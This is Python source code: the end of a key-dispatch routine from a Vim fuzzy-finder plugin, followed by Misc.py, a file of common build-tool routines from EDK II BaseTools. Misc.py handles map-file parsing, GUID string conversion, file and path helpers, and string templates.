self._index = 0 # search from beginning
if self._cli.pattern:
self._search(cur_content)
elif equal(cmd, '<C-K>'):
self._toUp()
self._previewResult(False)
elif equal(cmd, '<C-J>'):
self._toDown()
self._previewResult(False)
elif equal(cmd, '<Up>'):
if self._cli.previousHistory(self._getExplorer().getStlCategory()):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<Down>'):
if self._cli.nextHistory(self._getExplorer().getStlCategory()):
if self._getInstance().isReverseOrder():
lfCmd("normal! G")
else:
self._gotoFirstLine()
self._index = 0 # search from beginning
self._search(cur_content)
elif equal(cmd, '<LeftMouse>'):
if self._leftClick():
break
self._previewResult(False)
elif equal(cmd, '<2-LeftMouse>'):
self._leftClick()
if self.accept() is None:
break
elif equal(cmd, '<CR>'):
if self.accept() is None:
break
elif equal(cmd, '<C-X>'):
if self.accept('h') is None:
break
elif equal(cmd, '<C-]>'):
if self.accept('v') is None:
break
elif equal(cmd, '<C-T>'):
if self.accept('t') is None:
break
elif equal(cmd, '<C-\>'):
actions = ['', 'h', 'v', 't', 'dr']
action_count = len(actions)
selection = int( vim.eval(
'confirm("Action?", "&Edit\n&Split\n&Vsplit\n&Tabnew\n&Drop")' ) ) - 1
if selection < 0 or selection >= action_count:
selection = 0
action = actions[selection]
if self.accept(action) is None:
break
elif equal(cmd, '<Quit>'):
self._cli.writeHistory(self._getExplorer().getStlCategory())
self.quit()
break
elif equal(cmd, '<Tab>'): # switch to Normal mode
self._current_mode = 'NORMAL'
if self._getInstance().getWinPos() == 'popup':
if lfEval("exists('*leaderf#%s#NormalModeFilter')" % self._getExplorer().getStlCategory()) == '1':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')" % (self._getInstance().getPopupWinId(),
'leaderf#%s#NormalModeFilter' % self._getExplorer().getStlCategory()))
else:
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#NormalModeFilter', [%d]))"
% (self._getInstance().getPopupWinId(), id(self)))
self._setResultContent()
self.clearSelections()
self._cli.hideCursor()
self._createHelpHint()
self._resetHighlights()
if self._getInstance().isReverseOrder() and self._cli.pattern \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._cli.buildPopupPrompt()
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
break
elif equal(cmd, '<F5>'):
self.refresh(False)
elif equal(cmd, '<C-LeftMouse>') or equal(cmd, '<C-S>'):
if self._getExplorer().supportsMulti():
self.addSelections()
elif equal(cmd, '<S-LeftMouse>'):
if self._getExplorer().supportsMulti():
self.selectMulti()
elif equal(cmd, '<C-A>'):
if self._getExplorer().supportsMulti():
self.selectAll()
elif equal(cmd, '<C-L>'):
self.clearSelections()
elif equal(cmd, '<C-P>'):
self._ctrlp_pressed = True
self._previewResult(True)
self._ctrlp_pressed = False
elif equal(cmd, '<PageUp>'):
self._pageUp()
self._previewResult(False)
elif equal(cmd, '<PageDown>'):
self._pageDown()
self._previewResult(False)
elif equal(cmd, '<C-Up>'):
self._toUpInPopup()
elif equal(cmd, '<C-Down>'):
self._toDownInPopup()
else:
if self._cmdExtension(cmd):
break
# vim: set ts=4 sw=4 tw=0 et :
|
Misc.py
|
## @file
# Common routines used by all tools
#
# Copyright (c) 2007 - 2015, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Common.LongFilePathOs as os
import sys
import string
import thread
import threading
import time
import re
import cPickle
import array
import shutil
from UserDict import IterableUserDict
from UserList import UserList
from Common import EdkLogger as EdkLogger
from Common import GlobalData as GlobalData
from DataType import *
from BuildToolError import *
from CommonDataClass.DataClass import *
from Parsing import GetSplitValueList
from Common.LongFilePathSupport import OpenLongFilePath as open
## Regular expression used to find out place holders in string template
gPlaceholderPattern = re.compile("\$\{([^$()\s]+)\}", re.MULTILINE|re.UNICODE)
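# For example, in the template string "Build ${MODULE_NAME} for ${ARCH}", the
# pattern above captures the placeholder names "MODULE_NAME" and "ARCH".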
## Dictionary used to store file time stamp for quick re-access
gFileTimeStampCache = {} # {file path : file time stamp}
## Dictionary used to store dependencies of files
gDependencyDatabase = {} # arch : {file path : [dependent files list]}
def GetVariableOffset(mapfilepath, efifilepath, varnames):
""" Parse map file to get variable offset in current EFI file
    @param mapfilepath    Map file absolute path
    @param efifilepath    EFI binary file full path
    @param varnames       iterable container whose elements are variable names to be searched
    @return List whose elements are tuples of variable name and raw offset
"""
lines = []
try:
f = open(mapfilepath, 'r')
lines = f.readlines()
f.close()
except:
return None
if len(lines) == 0: return None
firstline = lines[0].strip()
if (firstline.startswith("Archive member included ") and
firstline.endswith(" file (symbol)")):
return _parseForGCC(lines, efifilepath, varnames)
return _parseGeneral(lines, efifilepath, varnames)
def _parseForGCC(lines, efifilepath, varnames):
""" Parse map file generated by GCC linker """
status = 0
sections = []
varoffset = []
for line in lines:
line = line.strip()
        # state machine transition
if status == 0 and line == "Memory Configuration":
status = 1
continue
elif status == 1 and line == 'Linker script and memory map':
status = 2
continue
        elif status == 2 and line == 'START GROUP':
status = 3
continue
# status handler
if status == 2:
m = re.match('^([\w_\.]+) +([\da-fA-Fx]+) +([\da-fA-Fx]+)$', line)
if m != None:
sections.append(m.groups(0))
for varname in varnames:
m = re.match("^([\da-fA-Fx]+) +[_]*(%s)$" % varname, line)
if m != None:
varoffset.append((varname, int(m.groups(0)[0], 16) , int(sections[-1][1], 16), sections[-1][0]))
if not varoffset:
return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs == None or len(efisecs) == 0:
return []
#redirection
redirection = 0
for efisec in efisecs:
for section in sections:
if section[0].strip() == efisec[0].strip() and section[0].strip() == '.text':
redirection = int(section[1], 16) - efisec[1]
ret = []
for var in varoffset:
for efisec in efisecs:
if var[1] >= efisec[1] and var[1] < efisec[1]+efisec[3]:
ret.append((var[0], hex(efisec[2] + var[1] - efisec[1] - redirection)))
return ret
def _parseGeneral(lines, efifilepath, varnames):
status = 0 #0 - beginning of file; 1 - PE section definition; 2 - symbol table
secs = [] # key = section name
varoffset = []
secRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\da-fA-F]+)[Hh]? +([.\w\$]+) +(\w+)', re.UNICODE)
symRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\.:\\\\\w\?@\$]+) +([\da-fA-F]+)', re.UNICODE)
for line in lines:
line = line.strip()
if re.match("^Start[' ']+Length[' ']+Name[' ']+Class", line):
status = 1
continue
if re.match("^Address[' ']+Publics by Value[' ']+Rva\+Base", line):
status = 2
continue
if re.match("^entry point at", line):
status = 3
continue
if status == 1 and len(line) != 0:
m = secRe.match(line)
assert m != None, "Fail to parse the section in map file , line is %s" % line
sec_no, sec_start, sec_length, sec_name, sec_class = m.groups(0)
secs.append([int(sec_no, 16), int(sec_start, 16), int(sec_length, 16), sec_name, sec_class])
if status == 2 and len(line) != 0:
for varname in varnames:
m = symRe.match(line)
assert m != None, "Fail to parse the symbol in map file, line is %s" % line
sec_no, sym_offset, sym_name, vir_addr = m.groups(0)
sec_no = int(sec_no, 16)
sym_offset = int(sym_offset, 16)
vir_addr = int(vir_addr, 16)
m2 = re.match('^[_]*(%s)' % varname, sym_name)
if m2 != None:
                    # found a binary PCD entry in the map file
for sec in secs:
if sec[0] == sec_no and (sym_offset >= sec[1] and sym_offset < sec[1] + sec[2]):
varoffset.append([varname, sec[3], sym_offset, vir_addr, sec_no])
if not varoffset: return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs == None or len(efisecs) == 0:
return []
ret = []
for var in varoffset:
index = 0
for efisec in efisecs:
index = index + 1
if var[1].strip() == efisec[0].strip():
ret.append((var[0], hex(efisec[2] + var[2])))
elif var[4] == index:
ret.append((var[0], hex(efisec[2] + var[2])))
return ret
## Routine to process duplicated INF
#
# This function is called by following two cases:
# Case 1 in DSC:
# [components.arch]
# Pkg/module/module.inf
# Pkg/module/module.inf {
# <Defines>
# FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836
# }
# Case 2 in FDF:
# INF Pkg/module/module.inf
# INF FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836 Pkg/module/module.inf
#
# This function copies Pkg/module/module.inf to
# Conf/.cache/0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf
#
# @param Path Original PathClass object
# @param BaseName New file base name
#
# @retval return the new PathClass object
#
def ProcessDuplicatedInf(Path, BaseName, Workspace):
Filename = os.path.split(Path.File)[1]
if '.' in Filename:
Filename = BaseName + Path.BaseName + Filename[Filename.rfind('.'):]
else:
Filename = BaseName + Path.BaseName
#
# If -N is specified on command line, cache is disabled
# The directory has to be created
#
DbDir = os.path.split(GlobalData.gDatabasePath)[0]
if not os.path.exists(DbDir):
os.makedirs(DbDir)
#
    # A temporary INF is copied to the database path, which must have write permission
    # The temporary file will be removed at the end of the build
# In case of name conflict, the file name is
# FILE_GUIDBaseName (0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf)
#
TempFullPath = os.path.join(DbDir,
Filename)
RtPath = PathClass(Path.File, Workspace)
#
    # Modify the full path to the temporary path; keep the others unchanged
#
# To build same module more than once, the module path with FILE_GUID overridden has
# the file name FILE_GUIDmodule.inf, but the relative path (self.MetaFile.File) is the real path
# in DSC which is used as relative path by C files and other files in INF.
# A trick was used: all module paths are PathClass instances, after the initialization
# of PathClass, the PathClass.Path is overridden by the temporary INF path.
#
# The reason for creating a temporary INF is:
# Platform.Modules which is the base to create ModuleAutoGen objects is a dictionary,
# the key is the full path of INF, the value is an object to save overridden library instances, PCDs.
# A different key for the same module is needed to create different output directory,
# retrieve overridden PCDs, library instances.
#
# The BaseName is the FILE_GUID which is also the output directory name.
#
#
RtPath.Path = TempFullPath
RtPath.BaseName = BaseName
#
# If file exists, compare contents
#
if os.path.exists(TempFullPath):
with open(str(Path), 'rb') as f1: Src = f1.read()
with open(TempFullPath, 'rb') as f2: Dst = f2.read()
if Src == Dst:
return RtPath
GlobalData.gTempInfs.append(TempFullPath)
shutil.copy2(str(Path), TempFullPath)
return RtPath
## Remove temporary created INFs whose paths were saved in gTempInfs
#
def ClearDuplicatedInf():
for File in GlobalData.gTempInfs:
if os.path.exists(File):
os.remove(File)
## callback routine for processing variable option
#
# This function can be used to process a variable number of option values. The
# typical usage is to specify an architecture list on the command line.
# (e.g. <tool> -a IA32 X64 IPF)
#
# @param Option Standard callback function parameter
# @param OptionString Standard callback function parameter
# @param Value Standard callback function parameter
# @param Parser Standard callback function parameter
#
# @retval
#
def ProcessVariableArgument(Option, OptionString, Value, Parser):
assert Value is None
Value = []
RawArgs = Parser.rargs
while RawArgs:
Arg = RawArgs[0]
if (Arg[:2] == "--" and len(Arg) > 2) or \
(Arg[:1] == "-" and len(Arg) > 1 and Arg[1] != "-"):
break
Value.append(Arg)
del RawArgs[0]
setattr(Parser.values, Option.dest, Value)
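## Illustrative usage sketch (not part of the original tool): register the
#  callback with optparse so that "-a IA32 X64" collects both values. The
#  option name and dest below are made up for this example.
#
#   Parser.add_option("-a", "--arch", action="callback", callback=ProcessVariableArgument,
#                     dest="ArchList", help="Architecture list, e.g. -a IA32 X64 IPF")
#   Options, Args = Parser.parse_args(["-a", "IA32", "X64"])
#   # Options.ArchList == ["IA32", "X64"]
#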
## Convert GUID string in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx style to C structure style
#
# @param Guid The GUID string
#
# @retval string The GUID string in C structure style
#
def GuidStringToGuidStructureString(Guid):
GuidList = Guid.split('-')
Result = '{'
for Index in range(0,3,1):
Result = Result + '0x' + GuidList[Index] + ', '
Result = Result + '{0x' + GuidList[3][0:2] + ', 0x' + GuidList[3][2:4]
for Index in range(0,12,2):
Result = Result + ', 0x' + GuidList[4][Index:Index+2]
Result += '}}'
return Result
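## Illustrative example (a hedged sketch, not from the original sources):
#  converting a registry-format GUID string to the C structure form.
#
#   GuidStringToGuidStructureString('0D1B936F-68F3-4589-AFCC-FB8B7AEBC836')
#   # -> '{0x0D1B936F, 0x68F3, 0x4589, {0xAF, 0xCC, 0xFB, 0x8B, 0x7A, 0xEB, 0xC8, 0x36}}'
#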
## Convert GUID structure in byte array to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in byte array
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureByteArrayToGuidString(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 16:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[3], 16),
int(guidValueList[2], 16),
int(guidValueList[1], 16),
int(guidValueList[0], 16),
int(guidValueList[5], 16),
int(guidValueList[4], 16),
int(guidValueList[7], 16),
int(guidValueList[6], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16),
int(guidValueList[11], 16),
int(guidValueList[12], 16),
int(guidValueList[13], 16),
int(guidValueList[14], 16),
int(guidValueList[15], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureStringToGuidString(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx format
#
def GuidStructureStringToGuidValueName(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
EdkLogger.error(None, FORMAT_INVALID, "Invalid GUID value string [%s]" % GuidValue)
return "%08x_%04x_%04x_%02x%02x_%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
## Create directories
#
# @param Directory The directory name
#
def CreateDirectory(Directory):
if Directory == None or Directory.strip() == "":
return True
try:
if not os.access(Directory, os.F_OK):
os.makedirs(Directory)
except:
return False
return True
## Remove directories, including files and sub-directories in it
#
# @param Directory The directory name
#
def RemoveDirectory(Directory, Recursively=False):
if Directory == None or Directory.strip() == "" or not os.path.exists(Directory):
return
if Recursively:
CurrentDirectory = os.getcwd()
os.chdir(Directory)
for File in os.listdir("."):
if os.path.isdir(File):
RemoveDirectory(File, Recursively)
else:
os.remove(File)
os.chdir(CurrentDirectory)
os.rmdir(Directory)
## Check if given file is changed or not
#
# This method is used to check if a file is changed or not between two build
# actions. It makes use of a cache to store file timestamps.
#
# @param File The path of file
#
# @retval True If the given file is changed, doesn't exist, or can't be
# found in timestamp cache
#   @retval False       If the given file is not changed
#
def IsChanged(File):
if not os.path.exists(File):
return True
FileState = os.stat(File)
TimeStamp = FileState[-2]
if File in gFileTimeStampCache and TimeStamp == gFileTimeStampCache[File]:
FileChanged = False
else:
FileChanged = True
gFileTimeStampCache[File] = TimeStamp
return FileChanged
## Store content in file
#
# This method is used to save a file only when its content has changed. This is
# quite useful for the "make" system to decide what will be re-built and what won't.
#
# @param File The path of file
# @param Content The new content of the file
# @param IsBinaryFile The flag indicating if the file is binary file or not
#
# @retval True If the file content is changed and the file is renewed
# @retval False If the file content is the same
#
def SaveFileOnChange(File, Content, IsBinaryFile=True):
if not IsBinaryFile:
Content = Content.replace("\n", os.linesep)
if os.path.exists(File):
try:
if Content == open(File, "rb").read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
DirName = os.path.dirname(File)
if not CreateDirectory(DirName):
EdkLogger.error(None, FILE_CREATE_FAILURE, "Could not create directory %s" % DirName)
else:
if DirName == '':
DirName = os.getcwd()
if not os.access(DirName, os.W_OK):
EdkLogger.error(None, PERMISSION_FAILURE, "Do not have write permission on directory %s" % DirName)
try:
if False: # VBox: Don't want python25.dll dependencies, original: if GlobalData.gIsWindows:
try:
from PyUtility import SaveFileToDisk
if not SaveFileToDisk(File, Content):
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData=File)
except:
Fd = open(File, "wb")
Fd.write(Content)
Fd.close()
else:
Fd = open(File, "wb")
Fd.write(Content)
Fd.close()
except IOError, X:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s'%X)
return True
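## Illustrative usage (a hedged sketch; MakefilePath and MakefileContent are
#  made-up names): only rewrite the file when the content really changed, so
#  that "make" does not see a newer timestamp and rebuild everything.
#
#   if SaveFileOnChange(MakefilePath, MakefileContent, False):
#       EdkLogger.verbose("Makefile regenerated: %s" % MakefilePath)
#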
## Make a Python object persistent on file system
#
# @param Data The object to be stored in file
# @param File The path of file to store the object
#
def DataDump(Data, File):
Fd = None
try:
Fd = open(File, 'wb')
cPickle.dump(Data, Fd, cPickle.HIGHEST_PROTOCOL)
except:
EdkLogger.error("", FILE_OPEN_FAILURE, ExtraData=File, RaiseError=False)
finally:
if Fd != None:
Fd.close()
## Restore a Python object from a file
#
# @param File The path of file stored the object
#
# @retval object A python object
# @retval None If failure in file operation
#
def DataRestore(File):
Data = None
Fd = None
try:
Fd = open(File, 'rb')
Data = cPickle.load(Fd)
except Exception, e:
EdkLogger.verbose("Failed to load [%s]\n\t%s" % (File, str(e)))
Data = None
finally:
if Fd != None:
Fd.close()
return Data
## Retrieve and cache the real path name in file system
#
#   @param      Root        The root directory that paths are relative to
#
# @retval str The path string if the path exists
# @retval None If path doesn't exist
#
class DirCache:
_CACHE_ = set()
_UPPER_CACHE_ = {}
def __init__(self, Root):
self._Root = Root
for F in os.listdir(Root):
self._CACHE_.add(F)
self._UPPER_CACHE_[F.upper()] = F
# =[] operator
def __getitem__(self, Path):
Path = Path[len(os.path.commonprefix([Path, self._Root])):]
if not Path:
return self._Root
if Path and Path[0] == os.path.sep:
Path = Path[1:]
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
UpperPath = Path.upper()
if UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
IndexList = []
LastSepIndex = -1
SepIndex = Path.find(os.path.sep)
while SepIndex > -1:
Parent = UpperPath[:SepIndex]
if Parent not in self._UPPER_CACHE_:
break
LastSepIndex = SepIndex
SepIndex = Path.find(os.path.sep, LastSepIndex + 1)
if LastSepIndex == -1:
return None
Cwd = os.getcwd()
os.chdir(self._Root)
SepIndex = LastSepIndex
while SepIndex > -1:
Parent = Path[:SepIndex]
ParentKey = UpperPath[:SepIndex]
if ParentKey not in self._UPPER_CACHE_:
os.chdir(Cwd)
return None
if Parent in self._CACHE_:
ParentDir = Parent
else:
ParentDir = self._UPPER_CACHE_[ParentKey]
for F in os.listdir(ParentDir):
Dir = os.path.join(ParentDir, F)
self._CACHE_.add(Dir)
self._UPPER_CACHE_[Dir.upper()] = Dir
SepIndex = Path.find(os.path.sep, SepIndex + 1)
os.chdir(Cwd)
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
elif UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
return None
## Get all files of a directory
#
# @param Root: Root dir
# @param SkipList : The files that need to be skipped
#
# @retval A list of all files
#
def GetFiles(Root, SkipList=None, FullPath = True):
OriPath = Root
FileList = []
for Root, Dirs, Files in os.walk(Root):
if SkipList:
for Item in SkipList:
if Item in Dirs:
Dirs.remove(Item)
for File in Files:
File = os.path.normpath(os.path.join(Root, File))
if not FullPath:
File = File[len(OriPath) + 1:]
FileList.append(File)
return FileList
## Check if given file exists or not
#
#   @param      File                  File name or path to be checked
#   @param      Ext                   Expected file extension; if given, the file must have this extension
#
#   @retval     True  if file exists
#   @retval     False if file doesn't exist
#
def ValidFile(File, Ext=None):
if Ext != None:
Dummy, FileExt = os.path.splitext(File)
if FileExt.lower() != Ext.lower():
return False
if not os.path.exists(File):
return False
return True
def RealPath(File, Dir='', OverrideDir=''):
NewFile = os.path.normpath(os.path.join(Dir, File))
NewFile = GlobalData.gAllFiles[NewFile]
if not NewFile and OverrideDir:
NewFile = os.path.normpath(os.path.join(OverrideDir, File))
NewFile = GlobalData.gAllFiles[NewFile]
return NewFile
def RealPath2(File, Dir='', OverrideDir=''):
NewFile = None
if OverrideDir:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile:
if OverrideDir[-1] == os.path.sep:
return NewFile[len(OverrideDir):], NewFile[0:len(OverrideDir)]
else:
return NewFile[len(OverrideDir)+1:], NewFile[0:len(OverrideDir)]
if GlobalData.gAllFiles:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(Dir, File))]
# VBox hack begin - Required for RAW reset vectors and logo bmps files outside the workspace.
if not NewFile and Dir == '' and os.path.isabs(File):
NewFile = os.path.normpath(File);
# VBox hack end.
if not NewFile:
NewFile = os.path.normpath(os.path.join(Dir, File))
if not os.path.exists(NewFile):
return None, None
if NewFile:
if Dir:
if Dir[-1] == os.path.sep:
return NewFile[len(Dir):], NewFile[0:len(Dir)]
else:
return NewFile[len(Dir)+1:], NewFile[0:len(Dir)]
else:
return NewFile, ''
return None, None
## Check if given file exists or not
#
#
def ValidFile2(AllFiles, File, Ext=None, Workspace='', EfiSource='', EdkSource='', Dir='.', OverrideDir=''):
NewFile = File
if Ext != None:
Dummy, FileExt = os.path.splitext(File)
if FileExt.lower() != Ext.lower():
return False, File
# Replace the Edk macros
if OverrideDir != '' and OverrideDir != None:
if OverrideDir.find('$(EFI_SOURCE)') > -1:
OverrideDir = OverrideDir.replace('$(EFI_SOURCE)', EfiSource)
if OverrideDir.find('$(EDK_SOURCE)') > -1:
OverrideDir = OverrideDir.replace('$(EDK_SOURCE)', EdkSource)
# Replace the default dir to current dir
if Dir == '.':
Dir = os.getcwd()
Dir = Dir[len(Workspace)+1:]
# First check if File has Edk definition itself
if File.find('$(EFI_SOURCE)') > -1 or File.find('$(EDK_SOURCE)') > -1:
NewFile = File.replace('$(EFI_SOURCE)', EfiSource)
NewFile = NewFile.replace('$(EDK_SOURCE)', EdkSource)
NewFile = AllFiles[os.path.normpath(NewFile)]
if NewFile != None:
return True, NewFile
# Second check the path with override value
if OverrideDir != '' and OverrideDir != None:
NewFile = AllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile != None:
return True, NewFile
# Last check the path with normal definitions
File = os.path.join(Dir, File)
NewFile = AllFiles[os.path.normpath(File)]
if NewFile != None:
return True, NewFile
return False, File
## Check if given file exists or not
#
#
def ValidFile3(AllFiles, File, Workspace='', EfiSource='', EdkSource='', Dir='.', OverrideDir=''):
# Replace the Edk macros
if OverrideDir != '' and OverrideDir != None:
if OverrideDir.find('$(EFI_SOURCE)') > -1:
OverrideDir = OverrideDir.replace('$(EFI_SOURCE)', EfiSource)
if OverrideDir.find('$(EDK_SOURCE)') > -1:
OverrideDir = OverrideDir.replace('$(EDK_SOURCE)', EdkSource)
# Replace the default dir to current dir
# Dir is current module dir related to workspace
if Dir == '.':
Dir = os.getcwd()
Dir = Dir[len(Workspace)+1:]
NewFile = File
RelaPath = AllFiles[os.path.normpath(Dir)]
NewRelaPath = RelaPath
while(True):
# First check if File has Edk definition itself
if File.find('$(EFI_SOURCE)') > -1 or File.find('$(EDK_SOURCE)') > -1:
File = File.replace('$(EFI_SOURCE)', EfiSource)
File = File.replace('$(EDK_SOURCE)', EdkSource)
NewFile = AllFiles[os.path.normpath(File)]
if NewFile != None:
NewRelaPath = os.path.dirname(NewFile)
File = os.path.basename(NewFile)
#NewRelaPath = NewFile[:len(NewFile) - len(File.replace("..\\", '').replace("../", '')) - 1]
break
# Second check the path with override value
if OverrideDir != '' and OverrideDir != None:
NewFile = AllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile != None:
#NewRelaPath = os.path.dirname(NewFile)
NewRelaPath = NewFile[:len(NewFile) - len(File.replace("..\\", '').replace("../", '')) - 1]
break
# Last check the path with normal definitions
NewFile = AllFiles[os.path.normpath(os.path.join(Dir, File))]
if NewFile != None:
break
# No file found
break
return NewRelaPath, RelaPath, File
def GetRelPath(Path1, Path2):
FileName = os.path.basename(Path2)
L1 = os.path.normpath(Path1).split(os.path.normpath('/'))
L2 = os.path.normpath(Path2).split(os.path.normpath('/'))
for Index in range(0, len(L1)):
if L1[Index] != L2[Index]:
FileName = '../' * (len(L1) - Index)
for Index2 in range(Index, len(L2)):
FileName = os.path.join(FileName, L2[Index2])
break
return os.path.normpath(FileName)
## Get GUID value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
#
# @retval GuidValue if the CName is found in any given package
#   @retval None        if the CName is not found in any of the given packages
#
def GuidValue(CName, PackageList):
for P in PackageList:
if CName in P.Guids:
return P.Guids[CName]
return None
## Get Protocol value from given packages
#
#   @param CName           The CName of the Protocol
#   @param PackageList     List of packages looking-up in
#
#   @retval GuidValue   if the CName is found in any given package
#   @retval None        if the CName is not found in any of the given packages
#
def ProtocolValue(CName, PackageList):
for P in PackageList:
if CName in P.Protocols:
return P.Protocols[CName]
return None
## Get PPI value from given packages
#
#   @param CName           The CName of the PPI
#   @param PackageList     List of packages looking-up in
#
#   @retval GuidValue   if the CName is found in any given package
#   @retval None        if the CName is not found in any of the given packages
#
def PpiValue(CName, PackageList):
for P in PackageList:
if CName in P.Ppis:
return P.Ppis[CName]
return None
## A string template class
#
# This class implements a template for string replacement. A string template
# looks like the following:
#
#       ${BEGIN} other_string ${placeholder_name} other_string ${END}
#
# The string between ${BEGIN} and ${END} will be repeated as many times as the
# length of "placeholder_name", which is a list passed in through a dict. The
# "placeholder_name" is the key name of the dict. ${BEGIN} and ${END} can be
# omitted; in this case, the "placeholder_name" must not be a list and it will
# just be replaced once. (An illustrative usage sketch follows the class below.)
#
class TemplateString(object):
_REPEAT_START_FLAG = "BEGIN"
_REPEAT_END_FLAG = "END"
class Section(object):
_LIST_TYPES = [type([]), type(set()), type((0,))]
def __init__(self, TemplateSection, PlaceHolderList):
self._Template = TemplateSection
self._PlaceHolderList = []
# Split the section into sub-sections according to the position of placeholders
if PlaceHolderList:
self._SubSectionList = []
SubSectionStart = 0
#
# The placeholders passed in must be in the format of
#
# PlaceHolderName, PlaceHolderStartPoint, PlaceHolderEndPoint
#
for PlaceHolder,Start,End in PlaceHolderList:
self._SubSectionList.append(TemplateSection[SubSectionStart:Start])
self._SubSectionList.append(TemplateSection[Start:End])
self._PlaceHolderList.append(PlaceHolder)
SubSectionStart = End
if SubSectionStart < len(TemplateSection):
self._SubSectionList.append(TemplateSection[SubSectionStart:])
else:
self._SubSectionList = [TemplateSection]
def __str__(self):
return self._Template + " : " + str(self._PlaceHolderList)
def Instantiate(self, PlaceHolderValues):
RepeatTime = -1
RepeatPlaceHolders = {}
NonRepeatPlaceHolders = {}
for PlaceHolder in self._PlaceHolderList:
if PlaceHolder not in PlaceHolderValues:
continue
Value = PlaceHolderValues[PlaceHolder]
if type(Value) in self._LIST_TYPES:
if RepeatTime < 0:
RepeatTime = len(Value)
elif RepeatTime != len(Value):
EdkLogger.error(
"TemplateString",
PARAMETER_INVALID,
"${%s} has different repeat time from others!" % PlaceHolder,
ExtraData=str(self._Template)
)
RepeatPlaceHolders["${%s}" % PlaceHolder] = Value
else:
NonRepeatPlaceHolders["${%s}" % PlaceHolder] = Value
if NonRepeatPlaceHolders:
StringList = []
for S in self._SubSectionList:
if S not in NonRepeatPlaceHolders:
StringList.append(S)
else:
StringList.append(str(NonRepeatPlaceHolders[S]))
else:
StringList = self._SubSectionList
if RepeatPlaceHolders:
TempStringList = []
for Index in range(RepeatTime):
for S in StringList:
if S not in RepeatPlaceHolders:
TempStringList.append(S)
else:
TempStringList.append(str(RepeatPlaceHolders[S][Index]))
StringList = TempStringList
return "".join(StringList)
## Constructor
def __init__(self, Template=None):
self.String = ''
